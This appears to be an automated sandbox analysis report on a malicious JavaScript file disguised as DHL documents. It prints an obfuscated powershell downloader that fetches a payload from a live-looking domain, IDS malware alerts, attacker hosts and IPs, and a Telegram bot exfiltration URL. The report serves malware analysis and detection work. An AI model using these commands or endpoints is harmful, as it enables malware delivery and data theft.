                  Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  JavaScript source code contains functionality to generate code involving a shell, file or stream
                  Source: DHl-Global-Documents.jsReturn value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', 'Scripting.FileSystemObject,[object Object]', 'ADODB.Stream,[object Object]']
                  Source: DHl-Global-Documents.jsReturn value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', 'Scripting.FileSystemObject,[object Object]', 'ADODB.Stream,[object Object]']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', 'ADODB.Stream,[object Object]']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', 'ADODB.Stream,[object Object]']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', '"Scripting.FileSystemObject"', 'ADODB.Stream,[object Object]', '"ADODB.Stream"']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', '"Scripting.FileSystemObject"', 'ADODB.Stream,[object Object]', '"ADODB.Stream"']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', '"Scripting.FileSystemObject"', 'ADODB.Stream,[object Object]', '"ADODB.Stream"']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc', 'WScript.Shell,[object Object]', '"WScript.Shell"', 'Scripting.FileSystemObject,[object Object]', '"Scripting.FileSystemObject"', 'ADODB.Stream,[object Object]', '"ADODB.Stream"']
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 010F9731h3_2_010F9480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 010F9E5Ah3_2_010F9A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 010F9E5Ah3_2_010F9A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 010F9E5Ah3_2_010F9D87

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 159.253.39.62:443 -> 192.168.2.4:49732
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 159.253.39.62:443 -> 192.168.2.4:49732
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.105:443 -> 192.168.2.4:49731
                  JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                  Source: DHl-Global-Documents.jsArgument value : ['"<psf:PrintTicket xmlns:psf="http://schemas.microsoft.com/windows/2003/08/printing/printschemaframew']
                  Source: DHl-Global-Documents.jsArgument value : ['"<!doctype html>\n<html>\n<head>\n<title>\\x6587\\x5b57\\x30b3\\x30fc\\x30c9\\x266b</title>\n<meta charset="ut']
                  Source: DHl-Global-Documents.jsReturn value : ['"<!doctype html>\n<html>\n<head>\n<title>\\x6587\\x5b57\\x30b3\\x30fc\\x30c9\\x266b</title>\n<meta charset="ut']
                  Source: DHl-Global-Documents.jsReturn value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc']
                  Source: DHl-Global-Documents.jsReturn value : ['alert,confirm,prompt,setTimeout,clearTimeout,setInterval,clearInterval,XMLHttpRequest,console']
                  Source: DHl-Global-Documents.jsReturn value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc']
                  Source: DHl-Global-Documents.jsArgument value : ['"powershell.exe -Command "$rhizocrinus = \'#x#.kes/moc.milezug#emsik//:sp##h\';$emasculation = $rhizoc']
                  Source: DHl-Global-Documents.jsArgument value : ['"SelectionNamespaces","xmlns:psf=\'http://schemas.microsoft.com/windows/2003/08/printing/printschemaf']
                  Source: DHl-Global-Documents.jsReturn value : ['alert,confirm,prompt,setTimeout,clearTimeout,setInterval,clearInterval,XMLHttpRequest,console']
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /sek.txt HTTP/1.1Host: kismetguzelim.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 193.30.119.105 193.30.119.105
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: NETINTERNETNetinternetBilisimTeknolojileriASTR NETINTERNETNetinternetBilisimTeknolojileriASTR
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 158.101.44.242:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /sek.txt HTTP/1.1Host: kismetguzelim.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: 3005.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: kismetguzelim.com
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2955066393.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                  Source: wscript.exe, 00000000.00000002.1732195649.000001DCC32FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://chemas.micrsoft.com/widows/2003/0/printing/pintschemafrmework
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A448BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kismetguzelim.com
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A456FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A447182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A446F61000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2955066393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A447182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A447182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com
                  Source: powershell.exe, 00000001.00000002.1812133774.000001A446C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS
                  Source: powershell.exe, 00000001.00000002.1811942715.000001A445405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A446F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A456FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A456FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A456FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A447182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A448BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kismetguzelim.com
                  Source: powershell.exe, 00000001.00000002.1812182640.000001A448BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kismetguzelim.com/sek.txt
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A456FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
